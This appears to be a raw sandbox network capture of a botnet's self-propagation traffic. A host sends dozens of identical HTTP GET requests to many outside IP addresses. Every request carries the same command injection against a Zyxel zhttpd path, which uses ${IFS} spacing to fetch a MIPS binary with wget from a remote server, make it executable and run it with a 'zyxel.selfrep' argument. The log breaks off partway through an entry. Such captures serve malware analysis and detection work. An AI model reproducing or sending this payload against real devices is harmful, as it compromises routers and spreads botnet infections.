                                            Feb 2, 2024 06:21:04.474024057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2229192.168.2.1554370155.242.9.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474061966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2230192.168.2.155629660.159.187.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474085093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2231192.168.2.1548486122.162.21.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474107027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2232192.168.2.1533042154.184.99.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474122047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2233192.168.2.155965072.94.156.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474178076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2234192.168.2.1543764141.7.71.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474205017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2235192.168.2.1533064140.170.208.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474253893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2236192.168.2.1538374147.61.91.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474275112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2237192.168.2.1533366199.191.93.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474338055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2238192.168.2.1540782186.27.162.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474370956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2239192.168.2.1533728191.69.62.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474400043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2240192.168.2.155925242.136.178.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474436998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2241192.168.2.1547360202.11.17.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474469900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2242192.168.2.154796851.89.196.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474498034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2243192.168.2.1546574108.18.203.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474533081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2244192.168.2.1548176156.137.57.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474591017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2245192.168.2.1556708202.93.96.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474625111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2246192.168.2.1559596186.174.194.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474658012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2247192.168.2.155674289.163.249.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474734068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2248192.168.2.1560856205.123.131.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474776030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2249192.168.2.154161072.223.179.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474786997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2250192.168.2.1537074107.224.226.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474828005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2251192.168.2.1540164131.243.44.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474857092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2252192.168.2.1549402180.21.36.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474896908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2253192.168.2.1544898139.140.3.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474919081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2254192.168.2.1560174198.174.156.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.474968910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2255192.168.2.154938087.145.130.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475003958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2256192.168.2.1550682155.3.182.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475043058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2257192.168.2.1550042122.73.73.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475064039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2258192.168.2.154426213.95.37.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475109100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2259192.168.2.1537314161.19.174.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475150108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2260192.168.2.153336894.156.254.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475171089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2261192.168.2.155840675.252.15.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475189924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2262192.168.2.1544666104.62.14.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475224018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2263192.168.2.1559464152.141.118.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475253105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2264192.168.2.154596647.94.149.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475311041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2265192.168.2.1559094223.55.163.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475358963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2266192.168.2.154552098.220.179.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475399971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2267192.168.2.1556184101.159.231.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475436926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2268192.168.2.155930266.247.250.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475460052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2269192.168.2.154239268.64.27.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475517988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2270192.168.2.153654689.244.218.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475550890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2271192.168.2.15526005.150.245.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475593090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2272192.168.2.154183484.193.189.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475630999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2273192.168.2.1553602190.226.224.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475657940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2274192.168.2.1551596117.67.233.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475687027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2275192.168.2.1541844119.129.45.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475733995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2276192.168.2.1535058181.84.33.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475769997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2277192.168.2.1547066114.155.240.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475802898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2278192.168.2.1553492180.34.112.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475846052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2279192.168.2.155635684.247.45.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475881100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2280192.168.2.1537602138.213.159.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475934029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2281192.168.2.1550406191.175.205.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.475980043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2282192.168.2.1560252208.254.77.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476007938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2283192.168.2.1558036111.133.234.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476017952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2284192.168.2.155507292.96.32.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476047039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2285192.168.2.1544066106.228.38.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476167917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2286192.168.2.153389643.159.108.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476207018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2287192.168.2.155730874.223.120.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476237059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2288192.168.2.1550520126.44.244.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476265907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2289192.168.2.1556372197.242.249.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476295948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2290192.168.2.1534032112.42.145.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476341009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2291192.168.2.155962866.175.149.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476391077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2292192.168.2.153478054.79.193.87443
                                            TimestampBytes transferredDirectionData
